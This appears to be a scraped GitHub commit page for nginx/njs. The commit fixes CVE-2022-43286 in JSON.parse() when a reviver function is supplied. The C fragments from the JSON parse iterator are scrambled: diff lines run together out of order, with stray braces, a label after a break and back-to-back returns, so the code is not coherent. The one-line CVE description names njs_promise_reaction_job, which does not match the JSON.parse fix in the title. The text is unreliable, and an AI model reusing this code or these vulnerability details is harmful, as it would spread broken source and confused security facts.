ret = njs\_function\_apply(vm, parse->function, arguments, 3, &parse->retval); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; } } } }  
if (njs\_is\_undefined(&parse->retval)) { ret = njs\_value\_property\_i64\_delete(vm, &state->value, state->index - 1, NULL);  
} else { ret = njs\_value\_property\_i64\_set(vm, &state->value, state->index - 1, &parse->retval); } njs\_value\_assign(&arguments\[0\], holder); njs\_value\_assign(&arguments\[1\], name); njs\_value\_assign(&arguments\[2\], &val);  
if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; } ret = njs\_function\_apply(vm, reviver, arguments, 3, retval);  
break; done:  
default: njs\_internal\_error(vm, "njs\_json\_parse\_iterator\_call() unexpected " "property type:%s", njs\_prop\_type\_string(prop->type)); if (keys != NULL) { njs\_array\_destroy(vm, keys); }  
return NJS\_OK; return ret; }

CVE-2022-43286: Fixed JSON.parse() when reviver function is provided. · nginx/njs@2ad0ea2

Nginx NJS v0.7.4 was discovered to contain a segmentation violation in njs_promise_reaction_job.

Tag

#js